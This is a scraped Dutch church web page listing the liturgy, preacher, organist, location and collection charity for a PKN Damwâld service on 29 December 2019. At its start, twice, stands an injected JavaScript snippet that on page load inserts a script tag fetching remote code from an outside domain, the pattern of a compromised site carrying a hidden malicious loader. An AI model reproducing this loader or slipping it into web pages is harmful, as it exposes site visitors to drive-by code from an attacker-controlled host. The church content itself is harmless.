;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 29 december 2019 14:00 uur - PKN Damwâld
zondag 29 december 2019
14:00 uur

Kerkdienst zondag 29 december 2019 14:00 uur

Informatie

Voorganger:Dhr. L. Blees, Driezum
Organist:Jelte Cuperus
Liturgie
Lied voor de dienst Elb 241
Welkom
Intochtslied Psalm 135 : 1 en 10
Stil gebed, Votum en groet
We zingen: Psalm 141 : 1 en 2
Gebed
Geloofsbelijdenis
We zingen: Psalm 75 : 1 en 7
Gebed
We lezen: Haggaï 1
We zingen: Psalm 49 : 1
Preek .
We zingen: Elb 406 : 1, 2 en 3
Gebed
Collecte
Slotlied Elb 396 : 1, 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stichting Schuilplaats

Stichting Schuilplaats
Stichting Schuilplaats is een landelijke, Interkerkelijke hulpverleningsorganisatie. Stichting Schuilplaats begeleidt mensen die vastgelopen zijn en wil hen weer op weg helpen om nieuw perspectief te zien. De overtuiging dat de Heere God betrokken is op alle mensen vormt hun belangrijkste drijfveer om zich in te zetten voor de mensen die hulp bij hen vragen. De hulpverleners van de Stichting Schuilplaats zetten hun vakkennis en deskundigheden in om de cliënten te begeleiden in hun psychosociale problemen. Stichting Schuilplaats biedt Christelijke psychosociale hulpverlening in samenwerking met lokale kerken. Daarvoor zijn in de regio 18 hulpverleningslocaties

Tweede collecte: Kerk
Uitganscollecte: Kerk